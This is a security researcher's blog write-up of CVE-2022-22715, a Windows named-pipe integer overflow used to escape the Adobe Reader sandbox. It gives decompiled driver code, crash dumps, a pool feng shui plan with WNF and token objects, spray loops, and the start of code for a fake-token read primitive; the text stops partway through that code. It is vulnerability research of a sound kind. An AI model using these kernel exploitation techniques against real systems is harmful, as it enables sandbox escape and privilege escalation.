Break me out of sandbox in old pipe - CVE-2022-22715 Windows Dirty Pipe

By: WHEREISK0SHL

25 August 2022 at 03:09

Author: k0shl of Cyber Kunlun

In February 2022, Microsoft patched the vulnerability I used at TianfuCup 2021 to escape the Adobe Reader sandbox and assigned it CVE-2022-22715. The vulnerability had existed in the Named Pipe File System for nearly 10 years, ever since AppContainer was born. We called it "Windows Dirty Pipe".

In this article, I will share the root cause and exploitation of Windows Dirty Pipe. So let's start our journey.

Background

A named pipe is a named, one-way or duplex pipe for communication between the pipe server and one or more pipe clients. Many browsers and applications use named pipes for IPC between the browser process and the renderer process. AppContainer was introduced with Windows 8 as a sandbox mechanism that isolates resource access for UWP applications.

Since then, some browsers and applications, such as the old Edge and Adobe Reader, have used AppContainer as their renderer process sandbox, and of course the Named Pipe File System added some mechanisms to support AppContainer. As a result, it brought us Windows Dirty Pipe: CVE-2022-22715.

Root Cause of Windows Dirty Pipe

The vulnerability existed in the Named Pipe File System driver, npfs.sys, and the vulnerable function is npfs!NpTranslateContainerLocalAlias. When we invoke NtCreateFile with a named pipe path, the request hits the IRP_MJ_CREATE major function of npfs, which is NpFsdCreate.

__int64 __fastcall NpFsdCreate(__int64 a1, _IRP *a2)
{
  [...]
  if ( RelatedFileObject )
  {
     [...]
  }
  if ( UnicodeString.Length )
  {
    if ( UnicodeString.Length == 2 && *UnicodeString.Buffer == 0x5C && !RelatedFileObject ) // ===> if open root directory
      goto LABEL_47;
  }
  else
  {
    if ( !RelatedFileObject || NamedPipeType == 0x201 )
    {
      [...]
    }
    if ( NamedPipeType == 0x206 )
    {
      LABEL_47:
      *(_OWORD *)&a2->IoStatus.Status = *(_OWORD *)NpOpenNamedPipeRootDirectory( // ===> open root directory
                                                     (__int64)&MasterIrp,
                                                     v3,
                                                     (__int64)FileObject);
      [...]
    }
  }
  if ( ifopenflag )
  {
    if ( !RelatedFileObject )
    {
      if ( createdisposition == 1 )
      {
        *(_OWORD *)&a2->IoStatus.Status = *(_OWORD *)NpOpenNamedPipePrefix(  // ====> open an existing directory named pipe
                                                       (__int64)v33,
                                                       v3,
                                                       FileObject,
                                                       v11,
                                                       DesiredAccess,
                                                       RequestorMode);
        [...]
      }
      if ( (unsigned int)(createdisposition - 2) <= 1 )
      {
        *(_OWORD *)&a2->IoStatus.Status = *(_OWORD *)NpCreateNamedPipePrefix(  // ====> create a new directory named pipe
                                                       (__int64)v34,
                                                       v3,
                                                       FileObject,
                                                       (struct _SECURITY_SUBJECT_CONTEXT *)v11,
                                                       DesiredAccess,
                                                       RequestorMode,
                                                       Options_high);
        [...]
      }
    }
    goto LABEL_57;
  }
  [...]
  Status = NpTranslateAlias((__m128i *)&namedpipename, ClientToken, &v39); // =====> create a new pipe
  [...]
}

The function dispatches to different handlers depending on the parameters of NtCreateFile, such as the RootDirectory of ObjectAttributes or the CreateDisposition. If we create a new named pipe, execution reaches NpTranslateAlias.

NTSTATUS __fastcall NpTranslateAlias(UNICODE_STRING *namedpipename, void *a2, _DWORD *a3)
{
  [...]
  *(_QWORD *)&String1.Length = 0xE000Ci64;
  String1.Buffer = L"LOCAL\\";
  DestinationString = 0i64;
  *a3 = 0;
  Length = _mm_cvtsi128_si32(*(__m128i *)namedpipename);
  String2 = *namedpipename;
  String2.Length = Length;
  if ( Length >= 2u && *String2.Buffer == 0x5C )
  {
    Length -= 2;
    String2.MaximumLength -= 2;
    v7 = 1;
    ++String2.Buffer;
    String2.Length = Length;
  }
  else
  {
    v7 = 0;
  }
  if ( !Length )
    return 0;
  if ( a2 && Length > 0xCu )
  {
    if ( RtlPrefixUnicodeString(&String1, &String2, 1u) ) // ====> compare "LOCAL\\" and prefix of named pipe name
      return NpTranslateContainerLocalAlias(namedpipename, a2, a3); // =====> vulnerable code
  [...]
}

The named pipe name, which we control, is passed into NpTranslateAlias. The function compares the prefix of the named pipe name with "LOCAL\"; if our name uses "LOCAL\" as its prefix, execution reaches NpTranslateContainerLocalAlias. This means we can use "\Device\NamedPipe\LOCAL\xxxxx" as the named pipe name.

Finally, we reach the vulnerable function. It's time to show the root cause.
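The prefix test can be modeled in user mode. The following is only a sketch under assumptions: names are plain ASCII C strings instead of UTF-16 UNICODE_STRINGs, and has_local_prefix is a hypothetical helper, not a function in npfs.sys. It mirrors the three conditions visible in the decompilation: a client token is present, the name (after one optional leading backslash) is longer than the prefix, and the prefix matches case-insensitively.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical model of the prefix test in NpTranslateAlias.
 * The driver compares byte lengths ("Length > 0xC"); with ASCII
 * strings this becomes "more than 6 characters". */
bool has_local_prefix(const char *name, bool has_client_token)
{
    static const char prefix[] = "LOCAL\\";
    const size_t prefix_len = sizeof(prefix) - 1;   /* 6 characters */

    if (name[0] == '\\')          /* skip one leading backslash */
        name++;

    if (!has_client_token || strlen(name) <= prefix_len)
        return false;

    /* Case-insensitive compare, like RtlPrefixUnicodeString(..., TRUE). */
    for (size_t i = 0; i < prefix_len; i++) {
        if (toupper((unsigned char)name[i]) != prefix[i])
            return false;
    }
    return true;
}
```

With this model, both "\LOCAL\mypipe" and "local\mypipe" take the alias path, while a bare "\LOCAL\" does not, because nothing follows the prefix.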

NTSTATUS __fastcall NpTranslateContainerLocalAlias(struct _UNICODE_STRING *namedpipename, void *a2, _DWORD *a3)
{
  [...]
  result = SeQueryInformationToken(a2, TokenIsAppContainer, &TokenInformation);
  if ( result >= 0 )
  {
    result = SeQueryInformationToken(a2, TokenIsRestricted|TokenGroups, &v28);
    if ( result >= 0 )
    {
      if ( !TokenInformation && !v28 ) // =====> token must be appcontainer or restricted
        return 0;
  [...]
  v14 = *namedpipename;
  *(_QWORD *)&v30 = *(_QWORD *)&namedpipename->Length;
  v15 = v30;
  v16 = (_WORD *)_mm_srli_si128((__m128i)v14, 8).m128i_u64[0];
  v17 = v16;
  *((_QWORD *)&v30 + 1) = v16;
  if ( *v16 == '\\' ) 
  {
    v17 = v16 + 1;
    ifslash = 1; // ====> if the named pipe name starts with "\\", ifslash is set to 1
    v15 = v30 - 2;
  }
  else
  {
    ifslash = 0;
  }
  [...] // ====> calculate the new prefix length
  v21 = prefixlength + namedpipenamelength + 0x14;
  v26.MaximumLength = v21;
  if ( ifslash )
  {
    v21 += 2; // ===> v21 is a ushort, so this addition can wrap it around to 0
    v26.MaximumLength = v21;
  }
  PoolWithTag = (WCHAR *)ExAllocatePoolWithTag(PagedPool, v21, 0x6E46704Eu); // ====> after the integer overflow v21 is 0, so only a small pool chunk is allocated
  v26.Buffer = PoolWithTag;
  if ( PoolWithTag )
  {
    if ( ifslash )
    {
      v26.Buffer = PoolWithTag + 1;
      v26.MaximumLength -= 2; // ====> if ifslash is 1, 0 minus 2 underflows and MaximumLength becomes 0xfffe
    }
    [...]
    RtlUnicodeStringPrintf(  // ====> writes up to MaximumLength (0xfffe) bytes into the small pool chunk, causing an out-of-bounds write
      &v26,
      L"Sessions\\%ld\\AppContainerNamedObjects\\%wZ\\%wZ\\%wZ",
      (unsigned int)v32,
      &v35,
      &DestinationString,
      &v30);
    [...]
  }
  [...]
}

First, npfs checks whether the process token is an AppContainer token or a restricted token. At least one of the two conditions must hold, which means the process must be an AppContainer process, a restricted sandboxed process, or both. Then the function checks whether the first wchar of the named pipe name is "\"; if so, npfs sets the variable |ifslash| to 1. After that, it calculates the length of the new named pipe prefix, which includes the SID, the session number, some fixed strings, and so on. Finally, it adds the named pipe name length and 0x14 to the new prefix length, and if |ifslash| is 1, it adds another 2 to the total size.

Note that all of these variables are of type ushort, so there is an obvious integer overflow: if we use a very long named pipe name, the total size wraps around to a small value.

After the calculation, npfs allocates a small pool chunk because of the small total size. Then, if |ifslash| is 1, it subtracts 2 from the total size. If the total size is 0, this is an integer underflow, and the MaximumLength of the unicode string becomes the large ushort value 0xfffe.

The function RtlUnicodeStringPrintf formats a string into the new pool buffer, and the amount it may write depends on the MaximumLength of the unicode string. If we triggered the integer underflow beforehand, npfs writes far more data than the small pool chunk can hold, which triggers an out-of-bounds write.
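The wraparound is easy to reproduce with 16-bit arithmetic in user mode. The sketch below is a model, not the driver code: compute_alias_sizes and struct alias_sizes are hypothetical names, and the prefix length passed in is an assumed value, since the real one depends on the session number and SID strings.

```c
#include <stdbool.h>
#include <stdint.h>

/* Sizes as the driver's 16-bit variables would see them (model only). */
struct alias_sizes {
    uint16_t alloc_size;      /* size handed to the pool allocator */
    uint16_t maximum_length;  /* MaximumLength handed to the printf routine */
};

struct alias_sizes compute_alias_sizes(uint16_t prefix_len, uint16_t name_len,
                                       bool ifslash)
{
    struct alias_sizes s;

    /* Every step is truncated to 16 bits, so sums wrap modulo 0x10000. */
    uint16_t total = (uint16_t)(prefix_len + name_len + 0x14);
    if (ifslash)
        total = (uint16_t)(total + 2);            /* may wrap to 0 */

    s.alloc_size = total;
    /* With a leading backslash the usable length is reduced by 2;
     * starting from 0 this underflows to 0xfffe. */
    s.maximum_length = ifslash ? (uint16_t)(total - 2) : total;
    return s;
}
```

For example, with an assumed prefix length of 0x60 and a name length of 0xff8a, the model yields an allocation size of 0 and a MaximumLength of 0xfffe, while a short name of 0x20 bytes yields the harmless pair 0x96 and 0x94.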

Crash Dump:

rax=0000000000000000 rbx=ffffe7862a687118 rcx=ffffe7862a687080
rdx=4141414141414141 rsi=4141414141414141 rdi=ffffe7862a6876d0
rip=fffff80313807bc8 rsp=ffffe40ab22d8420 rbp=ffffe7862a4e6820
 r8=ffffe40ab22d8470  r9=000001c7aa2763c0 r10=fffff80313807ac0
r11=ffffe7862a687080 r12=0000000000000001 r13=0000000000000001
r14=ffffe78628cbc060 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050246
nt!ExAcquirePushLockExclusiveEx+0x108:
fffff803`13807bc8 f0480fba2e00    lock bts qword ptr [rsi],0 ds:002b:41414141`41414141=????????????????

The crash dump shows that the out-of-bounds write corrupts other objects located after the 0x20 pool chunk.

The purpose of NpTranslateContainerLocalAlias is to translate a named pipe name that includes "LOCAL\" into a new named pipe name. For example, if the process is an AppContainer sandboxed process, it translates the named pipe name into a formatted string containing "AppContainerNamedObjects". AppContainerNamedObjects is a directory in the object manager that stores AppContainer-related objects. Npfs finally creates the new named pipe object under the AppContainerNamedObjects directory in the object manager.

But all of the size variables are of type ushort, and this is the root cause of Windows Dirty Pipe.
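To make the translation concrete, here is a small user-mode sketch that builds a name in the same shape as the driver's format string. It is only an illustration: format_container_alias is a hypothetical helper, narrow strings stand in for UNICODE_STRINGs, and the three string arguments are placeholders, because the decompilation does not show what the first two %wZ arguments contain.

```c
#include <stdio.h>

/* Hypothetical helper: formats a translated name following the layout
 * "Sessions\<id>\AppContainerNamedObjects\<a>\<b>\<name>".
 * part_a and part_b are placeholders for the two components that the
 * decompiled code passes before the pipe name. */
int format_container_alias(char *out, size_t out_size, long session_id,
                           const char *part_a, const char *part_b,
                           const char *pipe_name)
{
    /* snprintf never writes more than out_size bytes and returns the
     * length the full string needs, so truncation is detectable. */
    return snprintf(out, out_size,
                    "Sessions\\%ld\\AppContainerNamedObjects\\%s\\%s\\%s",
                    session_id, part_a, part_b, pipe_name);
}
```

A caller can compare the return value with the buffer size to detect a name that does not fit. That check is done in a wide integer type here, which is exactly what the ushort arithmetic in the driver fails to guarantee.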

Challenges of Windows Dirty Pipe

Having introduced the root cause of Windows Dirty Pipe, I want to share the challenges of CVE-2022-22715 before I present my exploitation.

When I triggered the crash and confirmed the vulnerability, I quickly realized that it is not easy to exploit. There are two challenges I had to face when writing the exploit.

1. The integer overflow in the total size calculation could produce other small values, such as 0x20, 0x30, 0x40 and so on, but the total size must be exactly 0, because we need the integer underflow to turn the MaximumLength of the unicode string into a large ushort value for the out-of-bounds write. If the total size is larger than 0, it is still a small value after subtracting 2, and no out-of-bounds write is triggered.
2. As I said above, the memcpy length is 0xfffe, which means I copy nearly 16 pages of data into a paged pool segment, so it is not easy to build a stable layout.
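The first challenge can be expressed as a small calculation. This is a sketch under assumptions: name_len_for_zero_total and max_len_after_adjust are hypothetical helpers, and the prefix length is an input that an exploit would have to determine for the target session and SID.

```c
#include <stdint.h>

/* Pipe-name length (in bytes) that makes the 16-bit total wrap to exactly 0
 * when a leading backslash is present.
 * Solves: prefix_len + name_len + 0x14 + 2 == 0 (mod 0x10000). */
uint16_t name_len_for_zero_total(uint16_t prefix_len)
{
    return (uint16_t)(0x10000u - 0x16u - prefix_len);
}

/* MaximumLength after the "- 2" adjustment for a given wrapped total. */
uint16_t max_len_after_adjust(uint16_t total)
{
    return (uint16_t)(total - 2);
}
```

Only a total of 0 produces the huge length: max_len_after_adjust(0) is 0xfffe, whereas a wrapped total of 0x20 merely gives 0x1e, which still fits inside the allocation.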

An interesting kernel pool allocation mechanism

The first step of my exploitation was to find a way to do the pool feng shui. In this situation, the corrupted pool chunk must be a 0x20 paged pool chunk, which is served by the kernel low fragmentation heap (LFH). At first, I wanted to spray 0x20 LFH chunks and corrupt some 0x20 object to complete the exploitation.

But there is a problem: I can't precisely control the position of the vulnerable 0x20 chunk in the LFH bucket, and the memcpy length is 0xfffe, so the write may corrupt unexpected objects or hit protected pages, which causes a BSoD.

I don't want to go deep into kernel pool allocation in this blog; there are many awesome articles and slides about it. Instead, let me share an interesting kernel pool allocation mechanism I used to solve the problem.

As we all know, the Windows kernel allocates pool segments with the backend allocator and subsegments with the frontend allocator. The interesting part is that different types of subsegment can be allocated in the same segment.

That got my attention!

After some tests, I confirmed that I can make a 0x20 LFH subsegment and a VS subsegment adjacent. This became my pool feng shui layout.

Stage 1: Preparation

Because the vulnerable pool is a paged pool, I chose WNF as my limited r/w primitive. I use _WNF_STATE_DATA as a limited out-of-bounds read/write object, the manager object; the maximum read/write range of _WNF_STATE_DATA is 0x1000. I also need another object to achieve arbitrary address read/write, the worker object. It's actually not difficult to find a suitable one: it must be a paged pool object with a pointer field that can be used to read or write an arbitrary address, for example through memcpy.

I finally decided to use the _TOKEN object as the worker object. If I invoke NtSetInformationToken with the TokenDefaultDacl TokenInformationClass, nt eventually calls nt!SepAppendDefaultDacl, which copies user-controlled content to a pointer field stored in the _TOKEN object.

void *__fastcall SepAppendDefaultDacl(_TOKEN *TOKEN, unsigned __int16 *usercontrolled)
{
  v3 = usercontrolled[1];
  v4 = (_ACL *)&TOKEN->DynamicPart[*((unsigned __int8 *)TOKEN->PrimaryGroup + 1) + 2];
  result = memmove(v4, usercontrolled, usercontrolled[1]);
  [...]
}

And if I invoke NtQueryInformationToken with the TokenBnoIsolation TokenInformationClass, nt copies the IsolationPrefix buffer to user-mode memory.

NTSTATUS __stdcall NtQueryInformationToken(
        HANDLE TokenHandle,
        TOKEN_INFORMATION_CLASS TokenInformationClass,
        PVOID TokenInformation,
        ULONG TokenInformationLength,
        PULONG ReturnLength)
{
  [...]
      case TokenBnoIsolation:
          [...]
          memmove(
            (char *)TokenInformation + 16,
            TOKEN->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.Buffer,
            TOKEN->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.MaximumLength);
        }
  [...]
}

So I can use the manager object to write a fake _TOKEN object structure over the adjacent worker object, then use NtSetInformationToken and NtQueryInformationToken as arbitrary r/w primitives.

Another object I need to prepare is the 0x20 spray object. I must fully control both its allocation and its free. I found a function named nt!NtRegisterThreadTerminatePort.

NTSTATUS __fastcall NtRegisterThreadTerminatePort(void *a1)
{
  CurrentThread = KeGetCurrentThread();
  Object = 0i64;
  result = ObReferenceObjectByHandle(a1, 1u, LpcPortObjectType, CurrentThread->PreviousMode, &Object, 0i64);
  if ( result >= 0 )
  {
    PoolWithQuotaTag = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, 0x10ui64, 0x70547350u);
    v4 = PoolWithQuotaTag;
    if ( PoolWithQuotaTag )
    {
      PoolWithQuotaTag[1] = Object;
      *PoolWithQuotaTag = CurrentThread[1].InitialStack;
      result = 0;
      CurrentThread[1].InitialStack = v4;
    }
    else
    {
      ObfDereferenceObject(Object);
      return -1073741670; // 0xC000009A, STATUS_INSUFFICIENT_RESOURCES
    }
  }
  return result;
}

The function references an LpcPort object, allocates a 0x20 paged pool chunk to store the LpcPort object pointer, and links the chunk into the _ETHREAD object. If we create a thread and invoke NtRegisterThreadTerminatePort many times in that thread, we can allocate a large number of 0x20 paged pool chunks.
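The bookkeeping behind this spray object can be modeled in user mode. The sketch below is not kernel code: struct term_port_block, struct thread_model and both functions are hypothetical names, malloc stands in for the paged pool, and the assumption that all blocks are released together when the thread exits is mine, as the decompiled function only shows the allocation side.

```c
#include <stdlib.h>

/* Model of the 0x10-byte block allocated per call: two pointers,
 * pushed onto a per-thread singly linked list. */
struct term_port_block {
    struct term_port_block *next;  /* previous list head */
    void *port;                    /* referenced port object */
};

struct thread_model {
    struct term_port_block *head;
    size_t count;
};

/* Models one NtRegisterThreadTerminatePort call. Returns 0 on success. */
int register_terminate_port(struct thread_model *t, void *port)
{
    struct term_port_block *b = malloc(sizeof(*b));
    if (!b)
        return -1;
    b->port = port;
    b->next = t->head;   /* same push as in the decompiled code */
    t->head = b;
    t->count++;
    return 0;
}

/* Models thread exit (assumption): every block on the list is freed. */
size_t release_all(struct thread_model *t)
{
    size_t freed = 0;
    while (t->head) {
        struct term_port_block *b = t->head;
        t->head = b->next;
        free(b);
        freed++;
    }
    t->count = 0;
    return freed;
}
```

In this model, one thread controls both halves of the spray: calling register_terminate_port in a loop creates the chunks, and ending the thread releases them all at once.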

Finally, there was a pool feng shui plan in my head:

1. Spray 0x20 paged pool chunks to fill the LFH subsegments. Once all segments are full, the backend allocator allocates a new segment, and our new 0x20 LFH subsegment is located in the new segment.
2. Spray _TOKEN objects and _WNF_STATE_DATA objects to fill the VS subsegments, making sure they share the same page. The frontend allocator eventually allocates a new VS subsegment, which is located in the segment created in step 1, adjacent to the LFH subsegment.

So our final pool feng shui layout is the following: the new 0x20 LFH subsegment, directly followed by the new VS subsegment that holds the _TOKEN and _WNF_STATE_DATA objects.

Note that I can't predict the vulnerable chunk's position in the LFH bucket, but I actually don't care about it. In this pool feng shui layout, the goal of the out-of-bounds write is to overwrite the manager object and the worker object in the VS subsegment, so I don't need to make a pool hole for the vulnerable object. I just fill the LFH bucket with spray objects and make sure the vulnerable object is located in the last LFH bucket.

Stage 2: Pool feng shui

When spraying WNF objects, I found that another object named _WNF_NAME_INSTANCES is created as well. It makes the frontend allocator create another LFH segment and affects our pool feng shui layout.

So before I do the pool feng shui, I create a lot of 0xd0 pool chunks and free them, leaving a large number of 0xd0 pool holes to hold the _WNF_NAME_INSTANCES objects.

for (UINT i = 0x0; i < 0x4000; i++) {//0xf000 for normal pool hole
        AllocateWnfObject(0xd0, &gStateName[i]);
}
for (UINT i = 0x0; i < 0x4000; i++) {//0xf000
        fNtDeleteWnfStateName(&gStateName[i]);//0x30
}

I first allocate a large number of spray objects and then spray _TOKEN objects and _WNF_STATE_DATA objects, which creates a new LFH subsegment and a new VS subsegment in the new segment. We can observe the final pool feng shui layout in windbg.

0: kd> !pool ffffb0880d69e000
Pool page ffffb0880d69e000 region is Paged pool
*ffffb0880d69e000 size:   20 previous size:    0  (Allocated) *PsTp Process: ffffc10b74a1c080
        Pooltag PsTp : Thread termination port block, Binary : nt!ps
 ffffb0880d69e020 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e040 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e060 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e080 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e0a0 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 
0: kd> !pool ffffb0880d69f000
Pool page ffffb0880d69f000 region is Paged pool
*ffffb0880d69f000 size:   20 previous size:    0  (Free)      *....
        Owning component : Unknown (update pooltag.txt)
 ffffb0880d69f020 size:   20 previous size:    0  (Free)       ....
 ffffb0880d69f040 size:   20 previous size:    0  (Free)       ....
 ffffb0880d69f060 size:   20 previous size:    0  (Free)       ....
 ffffb0880d69f080 size:   20 previous size:    0  (Free)       ....
 ffffb0880d69f0a0 size:   20 previous size:    0  (Free)       ....
 
0: kd> !pool ffffb0880d6a0000
Pool page ffffb0880d6a0000 region is Paged pool
*ffffb0880d6a0000 size:   20 previous size:    0  (Free)      *....
        Owning component : Unknown (update pooltag.txt)
 ffffb0880d6a0020 size:   20 previous size:    0  (Free)       ....
 ffffb0880d6a0040 size:   20 previous size:    0  (Free)       ....
 ffffb0880d6a0060 size:   20 previous size:    0  (Free)       ....
 ffffb0880d6a0080 size:   20 previous size:    0  (Free)       ....

0: kd> !pool ffffb0880d6a1000
Pool page ffffb0880d6a1000 region is Paged pool
*ffffb0880d6a1000 size:   20 previous size:    0  (Free)      *....
        Owning component : Unknown (update pooltag.txt)
 ffffb0880d6a1020 size:   20 previous size:    0  (Free)       ....
 ffffb0880d6a1040 size:   20 previous size:    0  (Free)       ....
 ffffb0880d6a1060 size:   20 previous size:    0  (Free)       ....
 ffffb0880d6a1080 size:   20 previous size:    0  (Free)       ....
 
0: kd> !pool ffffb0880d6a2000  // ======>  new VS subsegment header
Pool page ffffb0880d6a2000 region is Paged pool
*ffffb0880d6a2000 size:   30 previous size:    0  (Free)      *....
        Owning component : Unknown (update pooltag.txt)
 ffffb0880d6a2040 size:  880 previous size:    0  (Allocated)  Toke
 ffffb0880d6a28d0 size:  580 previous size:    0  (Allocated)  Wnf  Process: ffffc10b74a1c080
 ffffb0880d6a2e50 size:  190 previous size:    0  (Free)       ..D.

As the layout shows, there are many free LFH pool holes in the last LFH bucket, and the new VS subsegment is right next to the LFH bucket. If we create the vulnerable object now, it will land in one of the free LFH pool holes.

Note that the vulnerable object may not be located in the last LFH page, but that is not necessary: the out-of-bounds write may corrupt the LFH bucket, and this does not affect our exploitation.

0: kd> r
rax=ffffb0880d69e750 rbx=0000000000000002 rcx=0000000000000028
rdx=0000000000000000 rsi=0000000000000000 rdi=ffffe4835a302301
rip=fffff800401c2b31 rsp=ffffe4835a301e00 rbp=ffffe4835a301f00
 r8=0000000000000fff  r9=00000000000004ca r10=000000006e46704e
r11=0000000000001001 r12=ffffe4835a302220 r13=ffffe4835a302310
r14=0000000000000001 r15=000000000000ff01
iopl=0         nv up ei ng nz na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040282
Npfs!NpTranslateContainerLocalAlias+0x391:
fffff800`401c2b31 4889442450      mov     qword ptr [rsp+50h],rax ss:0018:ffffe483`5a301e50=0000000000000000

0: kd> !pool @rax // ===> vulnerable pool locate at one of free hole in LFH bucket
Pool page ffffb0880d69e750 region is Paged pool
 ffffb0880d69e700 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e720 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
*ffffb0880d69e740 size:   20 previous size:    0  (Allocated) *NpFn
        Pooltag NpFn : Name block, Binary : npfs.sys
 ffffb0880d69e760 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e780 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e7a0 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e7c0 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e7e0 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e800 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e820 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e840 size:   20 previous size:    0  (Free)       MPCt
 ffffb0880d69e860 size:   20 previous size:    0  (Free)       MPCt
 ffffb0880d69e880 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e8a0 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080
 ffffb0880d69e8c0 size:   20 previous size:    0  (Free)       MPCt
 ffffb0880d69e8e0 size:   20 previous size:    0  (Allocated)  PsTp Process: ffffc10b74a1c080

Then, once RtlUnicodeStringPrintf is invoked, it writes about 0xfffe bytes out of bounds, which corrupts both the LFH pool space and the VS pool space. The data written is the named pipe name, which we control, so we need to craft the payload so that it modifies _WNF_STATE_DATA->DataSize.

When we create a _WNF_STATE_DATA, we can't set DataSize larger than the _WNF_STATE_DATA data region, but after triggering the vulnerability we can change it. The maximum value of DataSize is 0x1000, so we gain a limited out-of-bounds r/w primitive that lets us modify the _TOKEN object in the next page.

0: kd> dq ffffb0880d6a28d0 l4
ffffb088`0d6a28d0  00001000`00001000 00001000`00001000
ffffb088`0d6a28e0  00001000`00001000 00001000`00001000

Stage 3: Gain arbitrary address r/w

In stage 2, we did the pool feng shui and gained a limited r/w primitive with the _WNF_STATE_DATA object, but there is a huge problem: how do I find which object handle I need to use?

If I corrupt an object and then use it through its handle, the corrupted object header will crash the system. So now I need to find a usable manager object (_WNF_STATE_DATA) name and worker object (_TOKEN) handle.

I thought of a solution. For the manager object, when we try to read data from the _WNF_STATE_DATA data region, we call NtQueryWnfStateData with a specified length; if the length is larger than DataSize, it returns the NT error code 0xc0000023. For the worker object, every _TOKEN object contains a unique LUID named TokenId, which can be queried through NtQueryInformationToken with the TokenStatistics TokenInformationClass. We can query it for each _TOKEN object we spray and store the results in an array.

Because _WNF_NAME_INSTANCES is not corrupted, we can use NtUpdateWnfStateData and NtQueryWnfStateData normally.

I have already corrupted some _WNF_STATE_DATA objects in stage 2 and changed their DataSize to 0x1000, so we can call NtQueryWnfStateData with a length of 0x1000 to find the corrupted _WNF_STATE_DATA objects, and read out-of-bounds data to find the last corrupted page, the one adjacent to the first normal page.

Reading out-of-bounds data does not corrupt the object structure, so we can safely call NtQueryWnfStateData with a length of 0x1000: if the _WNF_STATE_DATA object isn't corrupted, it returns 0xC0000023, and if it is, it returns the out-of-bounds data.

If the out-of-bounds data is our malicious data, I know that this _WNF_STATE_DATA is not in the last corrupted page. I use this method to find the last corrupted page, so that I can read the next normal page, which contains a _TOKEN object structure. The _WNF_STATE_DATA object in the last corrupted page is our manager object.

There is a LUID field in the _TOKEN object. We get it from the out-of-bounds read data and match it against the array we created before, and so we finally find the worker object.

0: kd> dq 0xffffb0880d6ae000 // ===>  the last corrupted page
ffffb088`0d6ae000  00010001`00010001 00010001`00010001
ffffb088`0d6ae010  00010001`00010001 00010001`00010001
ffffb088`0d6ae020  00010001`00010001 00010001`00010001
ffffb088`0d6ae030  00010001`00010001 00010001`00010001
0: kd> dq 0xffffb0880d6af000 // ===> the first normal page
ffffb088`0d6af000  656b6f54`03880000 00000000`00000000
ffffb088`0d6af010  000007b8`00001000 00000000`00000108
ffffb088`0d6af020  ffffc10b`775e8b80 00000000`00000000
ffffb088`0d6af030  00000000`00008000 00000000`00000001
ffffb088`0d6af040  00000000`00000000 00000000`0008006d
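The selection logic for the manager and worker objects can be sketched as a pure user-mode model. Everything here is hypothetical scaffolding: struct wnf_probe stands for the result of one 0x1000-byte query on a sprayed WNF object, struct sprayed_token for one entry of the TokenId array, and FILL_WORD for the 16-bit value 0x0001 that fills the corrupted pages in the dump above. No real WNF or token API is called.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define FILL_WORD 0x0001u   /* 16-bit fill value seen in the corrupted pages */

/* Result of one 0x1000-byte query on a sprayed WNF object (model). */
struct wnf_probe {
    bool corrupted;         /* true if data came back, false on 0xC0000023 */
    const uint16_t *oob;    /* words read past the object's own data */
    size_t oob_words;
};

/* A sprayed token: its handle plus the TokenId recorded at spray time. */
struct sprayed_token {
    void *handle;
    uint64_t token_id;
};

/* True when every out-of-bounds word is still the overflow fill value. */
bool is_all_fill(const uint16_t *data, size_t words)
{
    for (size_t i = 0; i < words; i++)
        if (data[i] != FILL_WORD)
            return false;
    return true;
}

/* Manager: a corrupted object whose neighbor is no longer pure fill data,
 * i.e. the object in the last corrupted page. Returns -1 if none. */
int find_manager(const struct wnf_probe *probes, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (probes[i].corrupted &&
            !is_all_fill(probes[i].oob, probes[i].oob_words))
            return (int)i;
    return -1;
}

/* Worker: the sprayed token whose TokenId matches the leaked one. */
int find_worker(const struct sprayed_token *tokens, size_t n,
                uint64_t leaked_id)
{
    for (size_t i = 0; i < n; i++)
        if (tokens[i].token_id == leaked_id)
            return (int)i;
    return -1;
}
```

The two lookups are independent: find_manager only needs the probe results, and find_worker only needs the TokenId leaked through the manager's out-of-bounds read.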

So far, I have the manager object name and the worker object handle. Next I construct 0x1000 bytes of fake data that include a fake _TOKEN object structure and a _WNF_STATE_DATA structure. I already got the content of the normal _TOKEN object structure by invoking NtQueryWnfStateData before, so I just need to change some values to gain arbitrary r/w primitives.

Read Primitive:

    FakeSepCached = malloc(0x48);
    ZeroMemory(FakeSepCached, 0x48);
    *(USHORT*)((ULONG_PTR)FakeSepCached + 0x2A) = 0x8;
    *(UINT64*)((ULONG_PTR)FakeSepCached + 0x30) = ReadAddress;

    CorruptionData = malloc(OriginalSize);
    ZeroMemory(CorruptionData, OriginalSize);
    CopyMemory(CorruptionData, gOccupyWorkerToken, OriginalSize);

    *(PUINT64)((UINT64)CorruptionData + TokenOffset + 0x480) = (UINT64)FakeSepCached;
    *(PUINT64)((UINT64)CorruptionData + TokenOffset - 0x30) = (UINT64)3;

